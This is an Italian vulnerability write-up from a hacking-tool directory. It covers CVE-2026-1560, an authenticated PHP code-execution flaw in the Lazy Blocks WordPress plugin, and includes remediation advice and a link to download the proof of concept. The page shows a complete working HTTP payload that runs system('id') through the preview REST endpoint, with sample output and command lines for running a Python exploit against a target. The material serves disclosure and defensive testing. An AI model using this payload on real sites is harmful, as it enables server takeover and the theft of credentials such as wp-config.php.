Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-1560-Authenticated-Remote-Code-Execution-in-Lazy-Blocks-4.2.0 — Proof-of-concept exploit per CVE-2026-1560, una vulnerabilità di esecuzione remota di codice autenticata nel plugin WordPress Lazy Blocks, che consente a utenti con privilegi bassi di eseguire PHP arbitrario tramite REST API. | Kitploit
Strumenti/GitHubGitHub/z3yr0xx/cve-2026-1560-authenticated-remote-code-execution-in-lazy-blocks-4.2.0
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneRed Teaming
GitHubz3yr0xx/cve-2026-1560-authenticated-remote-code-execution-in-lazy-blocks-4.2.0

CVE-2026-1560-Authenticated-Remote-Code-Execution-in-Lazy-Blocks-4.2.0

Proof-of-concept exploit per CVE-2026-1560, una vulnerabilità di esecuzione remota di codice autenticata nel plugin WordPress Lazy Blocks, che consente a utenti con privilegi bassi di eseguire PHP arbitrario tramite REST API.

Vedi Repository
26 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-1560 – Esecuzione Remota di Codice Autenticata in Custom Block Builder – Lazy Blocks ≤ 4.2.0

Ricercatore: ZeYrOXxx

Plugin: Custom Block Builder – Lazy Blocks

Versioni Affette: ≤ 4.2.0

Gravità: Alta

CVSS: 8.8

Tipo di Vulnerabilità: Esecuzione Remota di Codice Autenticata (RCE)

Vettore di Attacco: REST API

Privilegio Richiesto: edit_posts (Contributor+)


Riferimenti

  • Advisory Wordfence: https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/lazy-blocks/custom-block-builder-lazy-blocks-420-authenticated-contributor-remote-code-execution

Sintesi Esecutiva

È stata identificata una vulnerabilità di sicurezza ad alta gravità nel plugin WordPress Custom Block Builder – Lazy Blocks che interessa le versioni fino alla 4.2.0 inclusa.
La vulnerabilità consente a utenti autenticati con privilegi bassi (ruolo Contributor) di eseguire codice PHP arbitrario sul server tramite un endpoint REST API destinato alla funzionalità di anteprima dei blocchi.

Questo problema compromette completamente il modello dei privilegi di WordPress e può portare alla .

compromissione totale del server

Endpoint Vulnerabile

root@kitploit:~
POST /wp-json/lazy-blocks/v1/block-builder-preview/

L'endpoint è accessibile a qualsiasi utente autenticato con la capacità edit_posts.


Dettagli Tecnici

Controllo dei Permessi

La route REST è registrata con un callback di permessi debole:

root@kitploit:~
'permission_callback' => array( $this, 'block_builder_preview_permission' )

Questo include i Contributor, a cui non dovrebbe mai essere consentito eseguire codice PHP.


Percorso del Codice Vulnerabile

REST Controller – classes/class-rest.php

root@kitploit:~
$block = $request->get_param( 'block' );

$block_result = lazyblocks()->blocks()->render_callback(
    $attributes,
    null,
    null,
    $context,
    $block_data
);

Block Renderer – classes/class-blocks.php

root@kitploit:~
public function php_eval( $code, $attributes, $context ) {
    ob_start();
    eval( '?>' . $code );
    return ob_get_clean();
}

La funzione eval() esegue codice PHP controllato dall'attaccante senza sanitizzazione o validazione.


Analisi della Causa Radice

Lazy Blocks consente logica di rendering PHP personalizzata per i blocchi.
L'endpoint di anteprima della REST API accetta definizioni di blocchi fornite dall'utente e non distingue tra blocchi memorizzati attendibili e blocchi di anteprima controllati dall'attaccante.

Iniettando attributi di blocco appiattiti come:

  • code_output_method
  • code_editor_html

un attaccante può raggiungere il sink di esecuzione php_eval() ed eseguire codice PHP arbitrario.


Proof of Concept (HTTP)

Richiesta:

root@kitploit:~
POST /wp-json/lazy-blocks/v1/block-builder-preview/ HTTP/1.1
Host: example.com
Content-Type: application/json
Authorization: Basic [Contributor_Credentials]

{
    "context": "editor",
    "block": {
        "slug": "exploit-block",
        "code_output_method": "php",
        "code_editor_html": "<?php echo 'VULNERABLE: ' . system('id'); ?>"
    }
}

Risposta:

root@kitploit:~
HTTP/1.1 200 OK
Content-Type: application/json

{
    "success": true,
    "response": "<div useBlockProps>VULNERABLE: uid=33(www-data)...</div>"
}

✔ Esecuzione di comandi arbitrari confermata


Questo PoC è fornito esclusivamente per scopi di test di sicurezza e ricerca.


Impatto

Un attaccante con accesso Contributor può:

  • Eseguire comandi di sistema arbitrari
  • Leggere file sensibili (ad es., wp-config.php)
  • Modificare file sorgente PHP
  • Elevare i privilegi ad amministratore
  • Compromettere completamente l'istanza WordPress

Rimedio

  • Limitare il rendering PHP ai soli amministratori
  • Rimuovere l'uso di eval() su input controllati dall'utente
  • Impedire l'anteprima REST di blocchi contenenti codice PHP
  • Richiedere la capacità manage_options o unfiltered_html
  • Sostituire l'esecuzione PHP con meccanismi di templating sicuri

Utilizzo (PoC Python)

Requisiti

  • Python 3.x
  • Libreria requests
  • Credenziali WordPress valide con capacità edit_posts (Contributor+)

Installare la dipendenza

root@kitploit:~
pip install requests

Eseguire l'exploit

root@kitploit:~
python3 poc.py <target_url> <username> <password> "<command>"

Esempio

root@kitploit:~
python3 poc.py https://victim.site contributor password "id"

Se il target è vulnerabile, l'output del comando verrà restituito nella risposta HTTP.

⚠️ Questo proof-of-concept è destinato esclusivamente a test di sicurezza autorizzati e scopi di ricerca.

Scarica lo strumento